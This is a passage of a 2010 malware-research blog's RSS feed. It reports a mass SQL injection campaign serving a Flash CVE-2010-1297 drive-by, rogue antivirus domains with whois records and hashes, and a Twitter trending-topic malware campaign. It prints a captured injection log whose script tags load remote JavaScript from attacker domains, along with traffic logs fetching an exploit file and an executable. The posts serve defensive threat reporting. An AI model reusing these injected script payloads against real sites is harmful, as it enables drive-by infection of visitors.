		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[SQLi]]></category>
		<category><![CDATA[Video]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=2157</guid>
		<description><![CDATA[The crew behind the recent massive SQLi is currently exploiting  the latest CVE-2010-1297 vulnerability in its drive-by-download attacks.  Yesterday, I created a video demonstrating how Cloud Antivirus blocked the 0day exploit using the new behavioral blocking technology included in the free version.  Check that out here:

We recommend patching Adobe and then installing Cloud Antivirus to [...]]]></description>
			<content:encoded><![CDATA[<p>The crew behind the <a href="http://blog.sucuri.net/2010/06/mass-infection-of-iisasp-sites-robint-us.html">recent massive SQLi </a>is currently exploiting  the latest CVE-2010-1297 vulnerability in its drive-by-download attacks.  Yesterday, I created a video demonstrating how Cloud Antivirus blocked the 0day exploit using the new behavioral blocking technology included in the free version.  Check that out here:</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="640" height="480" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://vimeo.com/moogaloop.swf?clip_id=12449415&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=00adef&amp;fullscreen=1" /><embed type="application/x-shockwave-flash" width="640" height="480" src="http://vimeo.com/moogaloop.swf?clip_id=12449415&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=00adef&amp;fullscreen=1" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>We recommend <a href="http://bit.ly/dudJEk" target="_blank">patching Adobe</a> and then installing <a href="http://bit.ly/aTkShD" target="_blank">Cloud Antivirus</a> to prevent any future 0day attacks.</p>
<p>Here are some logs of our most recent encounter:</p>
<p><strong>Session traffic:</strong></p>
<p>GET hxxp://2677.in/cnzz.html</p>
<p>200 OK (text/html)</p>
<p>GET hxxp://2677.in/ie.html</p>
<p>200 OK (text/html)</p>
<p>GET hxxp://s11.cnzz.com/stat.php?id=1990191&amp;web_id=1990191</p>
<p>200 OK (text/html)</p>
<p>GET hxxp://2677.in/log.txt</p>
<p>200 OK (text/plain)</p>
<p>GET hxxp://2677.in/anhey.swf</p>
<p>200 OK (application/x-shockwave-flash)</p>
<p>GET hxxp://2677.in/anhey.swf</p>
<p>206 Partial Content (application/x-shockwave-flash)</p>
<p>GET</p>
<p>hxxp://zs13.cnzz.com/stat.htm?id=1990191&amp;r=http%3A//www.generationdb.com/&amp;lg</p>
<p>=en-us&amp;ntime=0.14859300%201276289711&amp;repeatip=0&amp;rtime=0&amp;cnzz_eid=82761217-12</p>
<p>76289711-http%3A//www.generationdb.com/&amp;showp=800&#215;600&amp;st=1276292642&amp;sin=http</p>
<p>%3A//www.generationdb.com/&amp;res=0</p>
<p>200 OK (image/gif)</p>
<p>GET hxxp://2677.in/log.exe</p>
<p>200 OK (application/octet-stream)</p>
<p><strong>Injection log:</strong></p>
<p>&lt; table width=&#8221;96%&#8221; border=&#8221;0&#8243; align=&#8221;center&#8221; cellpadding=&#8221;0&#8243;</p>
<p>cellspacing=&#8221;0&#8243;  &gt;</p>
<p>&lt; tr  &gt;</p>
<p>&lt; td colspan=&#8221;2&#8243;  &gt;   &lt; img alt=&#8221;" src=&#8221;images/5&#215;5.gif&#8221; width=&#8221;5&#8243; height=&#8221;8&#8243;</p>
<p>/  &gt;  &lt; /td  &gt;</p>
<p>&lt; /tr  &gt;</p>
<p>&lt; tr  &gt;</p>
<p>&lt; td align=&#8221;center&#8221; class=&#8221;hoverbox&#8221;  &gt;   &lt; a href=&#8221;#&#8221;  &gt;   &lt; img</p>
<p>src=&#8217;upload/community/moresmall_37726110_lego.jpg&lt; script src=hxxp://ww.robint.us/u.js  &gt;  &lt; /script  &gt;  &lt; script src=hxxp://2677.in/yahoo.js  &gt;  &lt; /script  &gt;  &#8216; alt=&#8221;" /  &gt;  &lt; img src=&#8217;upload/community/large_37726110_lego.jpg&lt; script src=http://ww.robint.us/u.js  &gt;  &lt; /script  &gt;  &lt; script src=hxxp://2677.in/yahoo.js  &gt;  &lt; /script  &gt;  &#8216; alt=&#8221;" class=&#8221;preview&#8221; /  &gt; &lt; /a  &gt;  &lt; /td  &gt;</p>
<p>&lt; td width=&#8221;55%&#8221; valign=&#8221;top&#8221; class=&#8221;category&#8221;  &gt;</p>
<p>&lt; a href=&#8221;unregisteredcommunity.aspx?Com_id=&#8217;7&#8242;&#8221;</p>
<p>target=&#8221;_self&#8221;  &gt;    We are all  &lt; /a  &gt;  &#8230; &lt; br  /  &gt;  Category: Groups,&lt;</p>
<p>br /  &gt;  Location: USA&lt; script src=hxxp://2677.in/yahoo.js  &gt;  &lt; /script  &gt; &lt; /td  &gt; &lt; /tr  &gt; &lt; tr  &gt; &lt; td colspan=&#8221;2&#8243;  &gt; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;&lt; /td  &gt; &lt; /tr  &gt; &lt; /table  &gt; &lt; /td  &gt;</p>
<p>&lt; /tr  &gt;  &lt; tr  &gt;</p>
<p>&lt; td  &gt;</p>
<p>&lt; table width=&#8221;96%&#8221; border=&#8221;0&#8243; align=&#8221;center&#8221; cellpadding=&#8221;0&#8243;</p>
<p>cellspacing=&#8221;0&#8243;  &gt;</p>
<p>&lt; tr  &gt;</p>
<p>&lt; td colspan=&#8221;2&#8243;  &gt;   &lt; img alt=&#8221;" src=&#8221;images/5&#215;5.gif&#8221; width=&#8221;5&#8243; height=&#8221;8&#8243;</p>
<p>/  &gt;  &lt; /td  &gt;</p>
<p>&lt; /tr  &gt;</p>
<p>&lt; tr  &gt;</p>
<p>&lt; td align=&#8221;center&#8221; class=&#8221;hoverbox&#8221;  &gt;   &lt; a href=&#8221;#&#8221;  &gt;   &lt; img</p>
<p>src=&#8217;upload/community/moresmall_2065474113_IMG_4127.JPG&lt; script src=hxxp://ww.robint.us/u.js  &gt;  &lt; /script  &gt;  &lt; script src=hxxp://2677.in/yahoo.js  &gt;  &lt; /script  &gt;  &#8216; alt=&#8221;" /  &gt;  &lt; img src=&#8217;upload/community/large_2065474113_IMG_4127.JPG&lt; script src=hxxp://ww.robint.us/u.js  &gt;  &lt; /script  &gt;  &lt; script src=hxxp://2677.in/yahoo.js  &gt;  &lt; /script  &gt;  &#8216; alt=&#8221;" class=&#8221;preview&#8221; /  &gt; &lt; /a  &gt;  &lt; /td  &gt;</p>
<p>&lt; td width=&#8221;55%&#8221; valign=&#8221;top&#8221; class=&#8221;category&#8221;  &gt;</p>
<p>&lt; a href=&#8221;unregisteredcommunity.aspx?Com_id=&#8217;6&#8242;&#8221;</p>
<p>target=&#8221;_self&#8221;  &gt;    Technosoft &lt; /a  &gt;  &#8230; &lt; br  /  &gt;  Category:</p>
<p>Business,&lt; br /  &gt;  Location: India&lt; script src=hxxp://2677.in/yahoo.js  &gt; &lt; /script  &gt;  &lt; /td  &gt; &lt; /tr  &gt; &lt; tr  &gt; &lt; td colspan=&#8221;2&#8243; class=&#8221;line&#8221;  &gt; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;&lt; /td  &gt; &lt; /tr  &gt; &lt; /table  &gt; &lt; /td  &gt;</p>
<p>&lt; /tr  &gt;</p>
<p>&lt; /table  &gt;</p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2010/06/11/robint-us-sqli-utilizing-cve-2010-1297-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>new rogue domains for Antivirus Soft</title>
		<link>http://malwaredatabase.net/blog/index.php/2010/06/02/new-antivirus-soft-domains/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2010/06/02/new-antivirus-soft-domains/#comments</comments>
		<pubDate>Wed, 02 Jun 2010 19:07:49 +0000</pubDate>
		<dc:creator>bartblaze</dc:creator>
				<category><![CDATA[Database Update]]></category>
		<category><![CDATA[Rogue Security Software]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=2071</guid>
		<description><![CDATA[Whois record for antispyware-guard.com
Registrant Contact:
Name: Vladimir Volvin
Address: 154 po box
City: New York,
Country: US (United States)
hxxp://antispyware-guard.com
Result: 3/20 (15 %)
Domain Hash: 664bb3514bfa487b37edc06834852f7f
URLVoid
Note: this page does not trigger a &#8220;scan&#8221; of your computer.
Some related domains:
hxxp://richav.net
hxxp://avblesk.com
hxxp://antispywareprog.com
Screenshot example:

Antivirus Soft home page
]]></description>
			<content:encoded><![CDATA[<p><a href="http://whois.domaintools.com/antispyware-guard.com">Whois record for antispyware-guard.com</a></p>
<p><strong>Registrant Contact:</strong><br />
Name: Vladimir Volvin<br />
Address: 154 po box<br />
City: New York,<br />
Country: US (United States)</p>
<p><strong>hxxp://antispyware-guard.com</strong><br />
Result: <strong><span style="color: red">3</span>/20</strong> (15 %)<br />
Domain Hash: 664bb3514bfa487b37edc06834852f7f<br />
<a href="http://www.urlvoid.com/scan/antispyware-guard.com">URLVoid</a><br />
<em>Note: this page does not trigger a &#8220;scan&#8221; of your computer.</em></p>
<p>Some related domains:<br />
<strong>hxxp://richav.net<br />
hxxp://avblesk.com<br />
hxxp://antispywareprog.com</strong></p>
<p>Screenshot example:</p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/avsoft-e1275505610745.jpg" alt="Antivirus Soft home page" /><br />
<em>Antivirus Soft home page</em></p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2010/06/02/new-antivirus-soft-domains/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>new rogue domain: rise-soft.info</title>
		<link>http://malwaredatabase.net/blog/index.php/2010/05/31/new-rogue-domain-rise-soft-info/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2010/05/31/new-rogue-domain-rise-soft-info/#comments</comments>
		<pubDate>Mon, 31 May 2010 17:32:42 +0000</pubDate>
		<dc:creator>bartblaze</dc:creator>
				<category><![CDATA[Database Update]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=2063</guid>
		<description><![CDATA[Whois record for rise-soft.info
Registrant Contact:
Name: Domain Admin
Address: P.O. Box 97
City: Moergestel
Country: NL (The Netherlands)
hxxp://rise-soft.info
Result: 2/19 (11 %)
Domain Hash: 89cbd9c11c7b11808db832b975e5f193
URLVoid
Note: this page does not trigger a &#8220;scan&#8221; of your computer.
Screenshot example:

Smart Defender Pro home page
]]></description>
			<content:encoded><![CDATA[<p><a href="http://whois.domaintools.com/rise-soft.info">Whois record for rise-soft.info</a></p>
<p><strong>Registrant Contact:</strong><br />
Name: Domain Admin<br />
Address: P.O. Box 97<br />
City: Moergestel<br />
Country: NL (The Netherlands)</p>
<p><strong>hxxp://rise-soft.info</strong><br />
Result: <strong><span style="color: red">2</span>/19</strong> (11 %)<br />
Domain Hash: 89cbd9c11c7b11808db832b975e5f193<br />
<a href="http://www.urlvoid.com/scan/rise-soft.info">URLVoid</a><br />
<em>Note: this page does not trigger a &#8220;scan&#8221; of your computer.</em></p>
<p>Screenshot example:</p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/05/sd-pro.jpg" alt="Smart Defender Pro home page" /><br />
<em>Smart Defender Pro home page</em></p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2010/05/31/new-rogue-domain-rise-soft-info/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>new rogue domain: rtsantivirus2010.com</title>
		<link>http://malwaredatabase.net/blog/index.php/2010/05/30/new-rogue-domain-rtsantivirus2010-com-2/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2010/05/30/new-rogue-domain-rtsantivirus2010-com-2/#comments</comments>
		<pubDate>Sun, 30 May 2010 21:29:22 +0000</pubDate>
		<dc:creator>bartblaze</dc:creator>
				<category><![CDATA[Database Update]]></category>
		<category><![CDATA[Rogue Security Software]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=2055</guid>
		<description><![CDATA[In my post  on 5 may, I talked about the rogue RST Antivirus.
Looks like they are back in business.
Whois record for rtsantivirus2010.com
Registrant Contact:
Name: Oleg M Chistuik
Address: manuilskogo 8
City: Dnepropetrovsk
Country: UA (Ukraine)
SetupRSTAV2010.msi
Result: 13/41 (20.00%)
MD5: b23f5df55530a58f7d9f9af7db75b4fc
VirusTotal
VirScan
Rogueware Page: hxxp://www.rtsantivirus2010.com
Note: this page does not trigger a &#8220;scan&#8221; of your computer.
This rogue is called RST Antivirus 2010 Pro, and [...]]]></description>
			<content:encoded><![CDATA[<p>In <a href="http://malwaredatabase.net/blog/index.php/2010/05/05/new-rogue-domain-rtsantivirus2010-com/">my post </a> on 5 may, I talked about the rogue RST Antivirus.<br />
Looks like they are back in business.</p>
<p><a href="http://whois.domaintools.com/rtsantivirus2010.com">Whois record for rtsantivirus2010.com</a></p>
<p><strong>Registrant Contact:</strong><br />
Name: Oleg M Chistuik<br />
Address: manuilskogo 8<br />
City: Dnepropetrovsk<br />
Country: UA (Ukraine)</p>
<p><strong>SetupRSTAV2010.msi</strong><br />
Result: <strong><span style="color: red">13</span>/41</strong> (20.00%)<br />
MD5: b23f5df55530a58f7d9f9af7db75b4fc<br />
<a href="http://www.virustotal.com/analisis/9c1effe5cd3c9a7b5c05e54b6c2c1a190eb972d35e45a6cd26d9b22ef5867db9-1275247654">VirusTotal</a><br />
<a href="http://virscan.org/report/0109b08c2210cfc9e678e5529df2c7d2.html">VirScan</a><br />
Rogueware Page: hxxp://www.rtsantivirus2010.com<br />
<em>Note: this page does not trigger a &#8220;scan&#8221; of your computer.</em></p>
<p>This rogue is called RST Antivirus 2010 Pro, and is a clone of the AKM Antivirus 2010 Pro rogueware.</p>
<p>Some screenshot examples:</p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/05/rst.jpg" alt="RTS Antivirus 2010 home page" /><br />
<em>RTS Antivirus 2010 home page</em></p>
<p>When executing the file ( <strong>SetupRSTAV2010.msi</strong> ):<br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/05/rstantivirus.jpg" alt="Setup of the rogueware program" /><br />
<em>Setup of the rogueware program</em></p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2010/05/30/new-rogue-domain-rtsantivirus2010-com-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Twitter Trending Topic Attack</title>
		<link>http://malwaredatabase.net/blog/index.php/2010/05/21/twitter-trending-topic-attack/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2010/05/21/twitter-trending-topic-attack/#comments</comments>
		<pubDate>Fri, 21 May 2010 23:19:21 +0000</pubDate>
		<dc:creator>lithium</dc:creator>
				<category><![CDATA[Hack]]></category>
		<category><![CDATA[Malicious Domains]]></category>
		<category><![CDATA[Malicious Links]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Twitter]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[Java]]></category>
		<category><![CDATA[Trending topic]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=2051</guid>
		<description><![CDATA[Almost a full year has passed since we discovered the first trending  topic attack on Twitter.  This time the attack came back in the same fashion, but it was  much less aggressive than the prior attack thanks to the swiftly acting Twitter security team.
In this latest attack, the tweet messages were coupled with [...]]]></description>
			<content:encoded><![CDATA[<p>Almost a full year has passed since we discovered the first <a href="http://pandalabs.pandasecurity.com/visualizing-the-twitter-trends-attack/" target="_blank">trending  topic attack</a> on Twitter.  This time the attack came back in the same fashion, but it was  much less aggressive than the prior attack thanks to the swiftly acting Twitter security team.</p>
<p>In this latest attack, the tweet messages were coupled with the trending topic items such as Justin Bieber, Oil Spill, and Official Twitter App.   The tweets all contained the text &#8220;<strong>haha this is the funniest  video ive EVER SEEN!</strong>&#8221; followed by a link to the malware campaign.</p>
<p>In the following image, you can see the results of a search taken shortly after the attack started.  As you can see, the accounts were communicating via the Twitter API, so it&#8217;s safe to assume that the cyber criminals behind the attack used some sort of script to make it all happen.</p>
<p><img src="http://pandalabs.pandasecurity.com/wp-content/uploads/2010/05/Twitter_results.jpg" alt="Twitter_results" width="397" height="560" /></p>
<p>Clicking any of the URLs starts the redirection process to a website where a malicious file is downloaded using the technique known as “drive  by download”, which runs this file automatically in the affected  computer, without user’s awareness.</p>
<p>The malware site used for the attack is <em>hxxp://pc-t</em>v.<em>tv/stickam/index2.html</em></p>
<p>In the following image you can see how it seems that a java  complement is being loaded, which is necessary to view the video:</p>
<p><img src="http://pandalabs.pandasecurity.com/wp-content/uploads/2010/05/Twitter_java_site.jpg" alt="Twitter_java_site" width="538" height="348" /></p>
<p>However, if we look at the code of this website, you can see how it’s  actually calling an EXE file, which belongs to the malware. It has been  detected as <em>W32/Lolbot.B.worm</em>.</p>
<p>The code is the following:</p>
<p><img src="http://pandalabs.pandasecurity.com/wp-content/uploads/2010/05/Twitter_code.jpg" alt="Twitter_code" width="526" height="781" /></p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2010/05/21/twitter-trending-topic-attack/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
